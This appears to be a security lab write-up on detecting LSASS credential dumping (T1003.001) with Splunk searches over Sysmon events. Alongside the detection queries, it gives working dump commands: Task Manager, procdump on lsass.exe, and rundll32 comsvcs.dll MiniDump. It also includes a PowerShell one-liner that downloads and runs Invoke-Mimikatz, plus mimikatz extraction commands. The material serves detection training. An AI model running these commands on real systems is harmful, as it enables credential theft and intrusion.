MITRE ATT&CK Techniques -
OS Credential Dumping
https://redcanary.com/threat-detection-report/techniques/lsass-memory/
https://www.picussecurity.com/resource/blog/picus-10-critical-mitre-attck-techniques-t1003-credential-dumping
 Goal: Detect credential dumping performed by an attacker using the Splunk SIEM.
 Achievement: Created detection rules (SPL searches) so that the SIEM detects the processes the attacker runs.
 Impact: Adversaries can use credentials gathered by this technique to:
 Access restricted information
 Access critical assets
 Perform lateral movement through the network by compromising other systems that accept the same credentials
 Create new accounts, perform actions, and remove the new account to clear tracks
 Analyze password patterns and password policy to reveal other credentials
OS Credential Dumping
(Technique: OS Credential Dumping, T1003; sub-technique T1003.001 LSASS Memory)
Introduction
Technique: OS Credential Dumping, T1003.001 LSASS Memory
 This technique lets adversaries obtain account login and password material (password hashes, Kerberos tickets and, on older configurations, plaintext passwords) from the operating system and software.
 The Local Security Authority Subsystem Service (LSASS) keeps the credentials of logged-in users in its memory so they can reach network resources without re-entering their credentials.
How?
 The attacker must interact with the lsass.exe process and dump its memory. This needs administrative rights on the host (SeDebugPrivilege), whichever tool is used.
Methods
 Several methods and tools can be used to dump the credentials held in memory:
1. Windows Task Manager: the "Create dump file" feature of Task Manager can dump the memory of the lsass.exe process (available since Windows Vista/Server 2008). No extra tooling has to be brought to the host.
2. ProcDump: a command-line utility from the Microsoft Sysinternals suite. It is a signed, legitimate admin tool, which is exactly why attackers favour it.
3. Comsvcs.dll: a native Windows DLL in %SystemRoot%\System32. It exports a MiniDump function that can write lsass.exe process memory to a file from which credentials are later retrieved.
LSASS process memory
-The Local Security Authority Subsystem Service (LSASS) stores credentials in memory on behalf of users with active Windows sessions.
-This allows users to seamlessly access network resources, such as file shares, Exchange Server mailboxes, and SharePoint sites, without re-entering their credentials for each remote service.
-Credentials recovered from LSASS process memory (password hashes, Kerberos tickets, sometimes plaintext passwords) can be used to conduct lateral movement.
Use Case (diagram): the attacker first gains access to the victim's machine, then dumps LSASS by one of three routes: Task Manager, Procdump, or comsvcs.dll.
Attack Diagram: the attacker gains access to the victim's machine and uses the OS Credential Dumping technique to obtain account logins and passwords.
Client PC (Victim): 10.10.10.x
Splunk SIEM Server: 192.168.10.x
Pre-requisites
 VM test machine running Windows (the victim)
 Splunk Server
 Splunk Forwarder on the victim, shipping the Microsoft-Windows-Sysmon/Operational channel
 Sysmon installed with a configuration that logs Process Create (1), Image Loaded (7), Process Access (10) and File Create (11); the searches below depend on all four
 Procdump
OS Credential Dumping
(Technique: OS Credential Dumping, T1003.001 LSASS Memory) – Attack Flow
LSASS Dump via Windows Task Manager – 1st Method
 Dumping the memory of the lsass.exe process with Task Manager:
 Open Task Manager and click "More details" to show all processes.
 Right-click "Local Security Authority Process" (lsass.exe) under Windows processes.
 Click "Create dump file". Task Manager writes the dump to %LOCALAPPDATA%\Temp\lsass.DMP.
Because Task Manager itself creates the dump, the attacker does not need to upload any suspicious executable to the target machine; the DMP file is downloaded and the credentials are extracted offline.
This is hands-on-keyboard activity that needs an interactive session with administrative rights. In the referenced case the adversary RDPed into each system and dumped credentials manually via Task Manager: the remote access the attacker already holds (RDP with an admin account) is what is abused, not a software vulnerability in RDP itself.
Result from Splunk:
SPL Command:
index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 TargetFilename="*lsass*.dmp" Image="C:\\Windows\\*\\taskmgr.exe"
| table TaskCategory, EventCode, Image, TargetFilename
Note:
-This is the query used in Splunk to detect credential dumping via this method.
-It looks for Sysmon EventCode 11, which is the 'File Create' operation.
-The process tied to the 'File Create' is Task Manager (taskmgr.exe) and the created file name contains lsass and ends in .dmp, i.e. the dump file.
-Caveat: EventCode 11 records the name at creation time, so renaming the file afterwards does not evade this search; what it cannot see is a dump taken by any tool other than Task Manager, which is why the next two methods need their own searches.
LSASS Dump via Procdump – 2nd Method
 Download Procdump, a Windows Sysinternals tool that creates memory dumps of running processes.
 Run: procdump.exe -accepteula -ma lsass.exe lsass.dmp
 (-accepteula suppresses the licence prompt; -ma writes a full memory dump.)
File successfully dumped.
***Note: Must be run as administrator.
Procdump
-Is legitimate, Microsoft-signed software, so traditional antivirus will not flag the binary itself. EDR products, however, commonly alert on procdump (or any process) opening lsass.exe, so "legitimate" does not mean "invisible".
-Its primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike, which an administrator or developer can use to determine the cause of the spike.
Possible access path:
SMB – with valid administrative credentials the attacker can reach the victim's shares (e.g. the ADMIN$ share), upload Procdump and execute it.
Result from Splunk:
SPL Command:
index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode=1 Image="*procdump*.exe" CommandLine="*lsass*") OR (EventCode=10 TargetImage="C:\\WINDOWS\\system32\\lsass.exe" GrantedAccess="0x1FFFFF" ("procdump"))
| dedup TaskCategory
| table _time, RuleName, TaskCategory, SourceImage, TargetImage, CommandLine, GrantedAccess
Note:
-For this method the Splunk search looks for EventCode 1 ('Process Create') and EventCode 10 ('Process Access').
-Process Create detects the procdump executable being launched with lsass on its command line; Process Access detects which process procdump opens, in this case LSASS.
-GrantedAccess 0x1FFFFF is PROCESS_ALL_ACCESS, which is what procdump -ma requests. Other dumpers request narrower masks (for example 0x1010 or 0x1438), so a production rule should test for the PROCESS_VM_READ bit (0x0010) in GrantedAccess rather than this single value.
-dedup TaskCategory keeps only one event per category, which is handy for a screenshot but hides repeated dumps; drop it in a real alert.
-Because a custom Sysmon configuration is in use, anything related to LSASS credential dumping is tagged in the RuleName field with technique_name=Credential Dumping. That is already configured.
LSASS Dump via Comsvcs.dll – 3rd Method
 The process ID of lsass.exe is needed to dump its memory using comsvcs.dll:
 Run: Get-Process lsass
comsvcs.dll is a built-in Windows DLL; it exports a MiniDump function that can be used to dump lsass.exe process memory.
Dynamic-link library
-Library files that contain code to carry out a specific function for an application on Windows operating systems.
Cont…
 Run (replace 692 with the PID returned by Get-Process): rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 692 C:\test\lsass.dmp full
***Note: Must be run as administrator, typically from an elevated PowerShell prompt, because the MiniDump export needs SeDebugPrivilege enabled.
-Windows DLL Host (rundll32.exe) loads comsvcs.dll and calls its MiniDumpW function,
-which then writes a MiniDump file of the target process.
****
The MiniDumpW function in comsvcs.dll is originally there for developers, to capture dumps for debugging when applications crash.
Result from Splunk:
SPL Command:
index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" comsvcs.dll
| table RuleName, EventCode, TaskCategory, Image, ImageLoaded, SourceImage, TargetImage, CommandLine
Note:
-For this method the Splunk search looks for any Sysmon event mentioning comsvcs.dll.
-Three event codes associated with comsvcs.dll are returned: EventCode 1, 7 and 10.
1 = Process Create: detects the execution of rundll32.exe with comsvcs.dll, MiniDump on its command line
7 = Image Loaded: rundll32.exe loading comsvcs.dll (to execute the MiniDump function)
10 = Process Access: rundll32.exe opening lsass.exe
-Caveat: comsvcs.dll is a COM+ component loaded by legitimate processes too, so the bare keyword search is noisy as an alert; tighten it by pairing EventCode 7 with Image=rundll32.exe and EventCode 1 with MiniDump in the CommandLine.
Alert Triggered
How does the attacker extract passwords from the dump file?
 Using Mimikatz
 After creating a dump file of the lsass.exe process, the attacker can use Mimikatz to extract password hashes (and any plaintext passwords or Kerberos tickets present) from it.
 Either the attacker downloads Mimikatz to the victim's PC and runs it there, or uploads the generated dump file to their own machine and extracts and cracks the hashes offline.
How?
 Command: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
 This one-liner loads PowerSploit's Invoke-Mimikatz into memory and reads credentials from the live LSASS process (-DumpCreds); it does not parse the dump file. To work from a dump offline, load it in mimikatz with sekurlsa::minidump lsass.dmp and then run sekurlsa::logonpasswords.
References
https://redcanary.com/threat-detection-report/techniques/lsass-memory/ (used for: comsvcs.dll method)
https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz (used for: all methods)
https://www.picussecurity.com/resource/blog/picus-10-critical-mitre-attck-techniques-t1003-credential-dumping (used for: all methods, including Invoke-Mimikatz)

Mitre Attack - Credential Dumping - updated.pptx